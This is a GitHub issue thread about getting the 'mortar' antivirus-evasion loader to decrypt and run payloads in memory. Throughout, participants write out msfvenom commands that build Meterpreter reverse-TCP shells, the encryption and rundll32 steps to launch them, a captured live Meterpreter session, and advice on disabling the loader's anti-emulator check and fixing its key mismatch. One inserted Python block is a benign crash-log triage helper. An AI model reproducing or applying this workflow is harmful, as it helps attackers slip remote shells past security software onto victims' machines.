Comments (30)

thedepartedpie avatar thedepartedpie commented on June 16, 2024 2

It's working for https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc but not for other payloads encrypted with the crypter.

from mortar.

lawrenceamer avatar lawrenceamer commented on June 16, 2024

It works fine for me; make sure you have compiled the DLL correctly and placed the bin.enc in the same folder.

lawrenceamer avatar lawrenceamer commented on June 16, 2024

I would advise you to first use the following mimikatz to test if agressor.dll is compiled correctly: https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins. If mimikatz works, maybe there is some issue with your msfvenom payload, which is fine on my side.

nathan-bowman avatar nathan-bowman commented on June 16, 2024

It works fine for me; make sure you have compiled the DLL correctly and placed the bin.enc in the same folder.

How can I double check that the DLL compiled correctly?

It seems to compile, with some errors...

image

nathan-bowman avatar nathan-bowman commented on June 16, 2024

I would advise you to first use the following mimikatz to test if agressor.dll is compiled correctly: https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins. If mimikatz works, maybe there is some issue with your msfvenom payload, which is fine on my side.

I renamed mimikatz.enc to bin.enc, dropped it in the current working directory with agressor.dll, and ran rundll32.exe agressor.dll,start and rundll32.exe agressor.dll,sh

Both don't work. So, perhaps I'm not compiling agressor.dll properly. Everything seems to compile fine; how can I verify?

lawrenceamer avatar lawrenceamer commented on June 16, 2024

image
Are you sure your project config is like that?

nathan-bowman avatar nathan-bowman commented on June 16, 2024

image
Are you sure your project config is like that?

I just verified, those are the same settings I have.

The Windows Application log shows Event ID 1000 errors.

Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b
Exception code: 0xe0465043
Fault offset: 0x0000000000034fd9
Faulting process id: 0x71c
Faulting application start time: 0x01d86f86ae713c8e
Faulting application path: C:\Windows\system32\rundll32.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: ede56f0a-c881-4752-bfc8-9c112894e97e
Faulting package full name: 
Faulting package-relative application ID: 

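A defender-side triage helper for the Event ID 1000 record above, added here as an example and not code from the mortar project. It parses the "Key: value" body of the event and decodes the low bytes of the exception code, which for 0xe0465043 spell "FPC", the tag the Free Pascal runtime uses for its SEH exceptions; the second (notepad.exe) record and the review rule are constructed assumptions.

```python
"""Added example (not mortar project code): triage Windows Application
log Event ID 1000 records like the one quoted in this thread."""
import re

# Record 1 is the one posted above; record 2 is a constructed benign crash.
SAMPLE_EVENTS = [
    "Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b\n"
    "Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b\n"
    "Exception code: 0xe0465043\n"
    "Faulting application path: C:\\Windows\\system32\\rundll32.exe\n"
    "Faulting package full name: \n",
    "Faulting application name: notepad.exe, version: 10.0.19041.1, time stamp: 0x00000000\n"
    "Faulting module name: ntdll.dll, version: 10.0.19041.1, time stamp: 0x00000000\n"
    "Exception code: 0xc0000005\n"
    "Faulting application path: C:\\Windows\\system32\\notepad.exe\n",
]
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_event(body):
    """Map each 'Key: value' line to a dict. The two '... name' lines also
    carry version and time stamp after commas; those become extra keys."""
    fields = {}
    for line in body.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if key.endswith(" name"):
            head, *rest = [p.strip() for p in value.split(",")]
            fields[key] = head
            for extra in rest:  # e.g. "version: 10.0.19041.746"
                sub, _, val = extra.partition(":")
                fields[key[:-4] + sub.strip()] = val.strip()
        else:
            fields[key] = value
    return fields


def exception_tag(code_hex):
    """ASCII spelled by the low three bytes of an SEH exception code, or
    None if not printable. 0xe0465043 -> 'FPC' (Free Pascal runtime),
    0xe06d7363 -> 'msc' (MSVC C++ exception)."""
    low = int(code_hex, 16).to_bytes(4, "big")[1:]
    return low.decode("ascii") if all(32 < b < 127 for b in low) else None


def triage(body):
    """Heuristic (assumption): a DLL hosted by rundll32.exe dying with a
    language-runtime exception code is worth checking against the DLL
    named on that rundll32 command line; plain access violations are not."""
    ev = parse_event(body)
    tag = exception_tag(ev.get("Exception code", "0x0"))
    app = ev.get("Faulting application name", "").lower()
    return {"app": app, "module": ev.get("Faulting module name"),
            "tag": tag, "review": app == "rundll32.exe" and tag is not None}
```
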
lawrenceamer avatar lawrenceamer commented on June 16, 2024

In order to see why that's happening on your system, let's try loading shellcode, not the PE:
msfvenom -p payload -lhost -lport -f c -o shellcode.bin
and then encrypt it, then place the bin.enc with aggressor and execute only agressor.sh

nathan-bowman avatar nathan-bowman commented on June 16, 2024

In order to see why that's happening on your system, let's try loading shellcode, not the PE: msfvenom -p payload -lhost -lport -f c -o shellcode.bin and then encrypt it, then place the bin.enc with aggressor and execute only agressor.sh

Workflow:

root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 -f c -o shell.c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
Saved as: shell.c
C:\Users\user\Documents\GitHub\mortar\Encryptor>encryptor.exe -f \Users\user\Desktop\shell.c -o Users\user\Desktop\bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to \Users\user\Desktop\bin.enc

C:\Users\user\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 749B-11F1

 Directory of C:\Users\user\Desktop

05/24/2022  08:52 AM    <DIR>          .
05/24/2022  08:52 AM    <DIR>          ..
05/24/2022  08:55 AM           850,928 agressor.dll
05/24/2022  09:06 AM             2,888 bin.enc
05/24/2022  10:51 PM             2,166 shell.c

Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,start

Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

lawrenceamer avatar lawrenceamer commented on June 16, 2024

I will do the test on all matching OSes with a clean system run. If it is working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now.

nathan-bowman avatar nathan-bowman commented on June 16, 2024

I will do the test on all matching OSes with a clean system run. If it is working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now.

Okay! I'm using libvirt kvm/qemu as a hypervisor. (https://libvirt.org/drvqemu.html)

lawrenceamer avatar lawrenceamer commented on June 16, 2024

Yup, that's clear now. I have an anti-emulator technique (could be some memory allocation), so better to try a regular PC or VMs.

nathan-bowman avatar nathan-bowman commented on June 16, 2024

Yup, that's clear now. I have an anti-emulator technique (could be some memory allocation), so better to try a regular PC or VMs.

It is a VM though... What would be the difference between a VM on VirtualBox or VMware Workstation vs what I'm using now?

lawrenceamer avatar lawrenceamer commented on June 16, 2024

I think that could be (not 100% sure) due to aggressor.dll not being able to allocate memory correctly. For example, in order to divert the AV emulator, the aggressor will try to see if it can allocate or not; if not, then it exits, and I feel that's what happened in your case. If you want to make sure, try to remove the following line and retest again:
https://github.com/0xsp-SRD/mortar/blob/main/DLL/agressor.lpr#L188

if isEmulated = true  then
  exit
  else

nathan-bowman avatar nathan-bowman commented on June 16, 2024

That didn't help with the crashes

image

nathan-bowman avatar nathan-bowman commented on June 16, 2024

Same results with Windows 7 :(

image

nathan-bowman avatar nathan-bowman commented on June 16, 2024

Small update: I installed and updated Windows 10 on Hyper-V. Removed the isEmulated if-statements, set the compiler options to Win64 and x86_64.

And it still doesn't work.

@lawrenceamer What hypervisor are you using?

lawrenceamer avatar lawrenceamer commented on June 16, 2024

Try to use the following demo for the test: https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc
then agressor.dll,start

lawrenceamer avatar lawrenceamer commented on June 16, 2024

@nathan-bowman the issue was that you were using the encryptor (Windows version), which is not what it should be. In order to encrypt the files you have to use the Linux version of the encryptor; you can do that by installing Lazarus on Kali:

apt install fpc
apt install lazarus-ide

After that, you can compile the Encryptor only and use it to encrypt Windows binaries.

lawrenceamer avatar lawrenceamer commented on June 16, 2024

While using the Linux encryptor, it should work with any x64 payload, or EXE that's not a .NET assembly. I have tested mortar with msfvenom; Cobalt also works fine.

nathan-bowman avatar nathan-bowman commented on June 16, 2024

While using the Linux encryptor, it should work with any x64 payload, or EXE that's not a .NET assembly. I have tested mortar with msfvenom; Cobalt also works fine.

The bin.enc you provide does work for me with the agressor.dll I built. Now, trying my own shell...

Build encryptor:

root@localhost:/opt/mortar/Encryptor# lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
Parameter: recursive
Parameter: os=Linux
Parameter: cpu=x86_64
Hint: (lazarus) primary config path: /root/.lazarus
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="" TargetCPU="" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS= TargetCPU= CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) Build Project: nothing to do.
TCompiler.Compile WorkingDir="/opt/mortar/Encryptor/" CompilerFilename="/usr/bin/fpc" CompilerParams=" -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
[TCompiler.Compile] CmdLine="/usr/bin/fpc -B  -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="linux" TargetCPU="x86_64" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS=linux TargetCPU=x86_64 CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP" "-Px86_64" "-Tlinux"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas" "-Px86_64" "-Tlinux"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) TBuildManager.MacroFuncInstantFPCCache /usr/bin/instantfpc
Hint: (lazarus) [RunTool] "/usr/bin/instantfpc" "--get-cache"
Hint: (lazarus) [TBuildManager.MacroFuncInstantFPCCache] /root/.cache/instantfpc/
Info: (lazarus) Execute Title="Compile Project, Target: encryptor"
Info: (lazarus) Working Directory="/opt/mortar/Encryptor/"
Info: (lazarus) Executable="/usr/bin/fpc"
Info: (lazarus) Param[0]="-B"
Info: (lazarus) Param[1]="-Tlinux"
Info: (lazarus) Param[2]="-Px86_64"
Info: (lazarus) Param[3]="-MObjFPC"
Info: (lazarus) Param[4]="-Scghi"
Info: (lazarus) Param[5]="-Cg"
Info: (lazarus) Param[6]="-O1"
Info: (lazarus) Param[7]="-g"
Info: (lazarus) Param[8]="-gl"
Info: (lazarus) Param[9]="-l"
Info: (lazarus) Param[10]="-vewnhibq"
Info: (lazarus) Param[11]="-Fi/opt/mortar/Encryptor/lib/x86_64-linux"
Info: (lazarus) Param[12]="-Fu/opt/mortar/Encryptor/"
Info: (lazarus) Param[13]="-FU/opt/mortar/Encryptor/lib/x86_64-linux/"
Info: (lazarus) Param[14]="-FE/opt/mortar/Encryptor/"
Info: (lazarus) Param[15]="-o/opt/mortar/Encryptor/encryptor"
Info: (lazarus) Param[16]="encryptor.lpr"
Hint: (11030) Start of reading config file /etc/fpc.cfg
Hint: (11031) End of reading config file /etc/fpc.cfg
Free Pascal Compiler version 3.0.4+dfsg-23 [2019/11/25] for x86_64
Copyright (c) 1993-2017 by Florian Klaempfl and others
(1002) Target OS: Linux for x86-64
(3104) Compiling encryptor.lpr
/opt/mortar/Encryptor/encryptor.lpr(101,3) Note: (5025) Local variable "de" not used
/opt/mortar/Encryptor/encryptor.lpr(102,6) Note: (5025) Local variable "s2" not used
/opt/mortar/Encryptor/encryptor.lpr(103,7) Note: (5025) Local variable "temp" not used
/opt/mortar/Encryptor/encryptor.lpr(104,3) Note: (5025) Local variable "i" not used
/opt/mortar/Encryptor/encryptor.lpr(98,10) Warning: (5033) Function result does not seem to be set
/opt/mortar/Encryptor/encryptor.lpr(146,43) Hint: (5091) Local variable "b64_encoded" of a managed type does not seem to be initialized
(9015) Linking /opt/mortar/Encryptor/encryptor
/usr/bin/ld.bfd: warning: /opt/mortar/Encryptor/link.res contains output sections; did you forget -T?
(1008) 173 lines compiled, 0.3 sec
(1021) 1 warning(s) issued
(1022) 3 hint(s) issued
(1023) 4 note(s) issued
[TCompiler.Compile] end

Build reverse shell:

root@localhost:/opt/mortar/Encryptor# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 --platform windows --arch x64 -f exe -o /root/shell64.exe
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /root/shell64.exe

Test from target Win10:

[*] Meterpreter session 121 opened (172.x.x.x:8080 -> x.x.x.x:20099) at 2022-05-27 14:18:57 +0000

Encrypt:

root@localhost:/opt/mortar/Encryptor# ./encryptor -f /root/shell64.exe -o /root/bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to /root/bin.enc

Both of these fail on target Win10:

C:\Users\user\Desktop>rundll32.exe agressor.dll,start
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

jad017 avatar jad017 commented on June 16, 2024

I have the same issue. It works well with the demo/bin.enc but not with my own payload.

lawrenceamer avatar lawrenceamer commented on June 16, 2024

image
It works with meterpreter; sometimes you need to execute it 3/4 times to make sure it is being executed in memory.
image

lawrenceamer avatar lawrenceamer commented on June 16, 2024

As I said, there are no issues on the mortar side; it is a kind of memory execution delay, or it could take time to be allocated with executable shellcode or an image. If it fails the first time, execute it 3/4 times to make it work.

nathan-bowman avatar nathan-bowman commented on June 16, 2024

As I said, there are no issues on the mortar side; it is a kind of memory execution delay, or it could take time to be allocated with executable shellcode or an image. If it fails the first time, execute it 3/4 times to make it work.

How exactly are you compiling encryptor?

Like?
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

lawrenceamer avatar lawrenceamer commented on June 16, 2024

Pushed the compiled version of the encryptor: https://github.com/0xsp-SRD/mortar/releases/tag/v2

nathan-bowman avatar nathan-bowman commented on June 16, 2024

Pushed the compiled version of the encryptor: https://github.com/0xsp-SRD/mortar/releases/tag/v2

That works! How are you compiling it? I'm using:
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

nathan-bowman avatar nathan-bowman commented on June 16, 2024

Pushed the compiled version of the encryptor: https://github.com/0xsp-SRD/mortar/releases/tag/v2

That works! How are you compiling it? I'm using: lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

^^^
@lawrenceamer can you post how you are compiling the encryptor?

goofsec avatar goofsec commented on June 16, 2024

Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21

nathan-bowman avatar nathan-bowman commented on June 16, 2024

Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21

This makes sense, I'll test later. If I don't reply again, it probably means that it worked.
